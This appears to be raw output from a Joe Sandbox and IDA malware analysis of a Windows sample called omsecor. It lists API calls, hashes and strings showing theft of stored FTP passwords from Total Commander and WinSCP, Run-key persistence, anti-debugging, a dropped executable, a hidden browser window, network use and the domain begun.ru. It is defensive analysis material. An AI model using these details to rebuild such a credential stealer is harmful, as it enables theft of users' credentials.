                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 268 407cd7-407cfe call 40d5b0 GetModuleFileNameW 271 407d00-407d0b call 406cf9 268->271 272 407d0d-407d15 GetCurrentDirectoryW 268->272 274 407d1b-407d31 call 4054ed 271->274 272->274 278 407d33-407d35 274->278 279 407d36-407d60 CreateFileW 274->279 278->279
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 280 407727-407751 call 40d5b0 GetModuleFileNameW 283 407753-40776b call 4075d4 280->283 284 40776d-40776e 280->284 289 4077e1-4077ea 283->289 286 407774-4077a0 ExpandEnvironmentStringsW call 4075d4 284->286 291 4077a2-4077a5 286->291 292 4077eb-4077ee 286->292 294 4077b7-4077ba 291->294 295 4077a7-4077b5 GetLastError 291->295 293 4077e0 292->293 293->289 296 4077d2-4077dc 294->296 297 4077bc-4077c8 GetLastError 294->297 298 4077ca call 40a786 295->298 296->286 300 4077de 296->300 297->298 301 4077cf 298->301 300->293 301->296
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 309 4069c0-4069fc RegQueryValueExW RegCloseKey
                          APIs
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 310 406d14-406d20 InternetAttemptConnect 311 406d22-406d25 310->311 312 406d26-406d41 InternetOpenW 310->312
                          APIs
                          • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$AttemptConnectOpen
                          • String ID:
                          • API String ID: 2984283330-0
                          • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                          • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
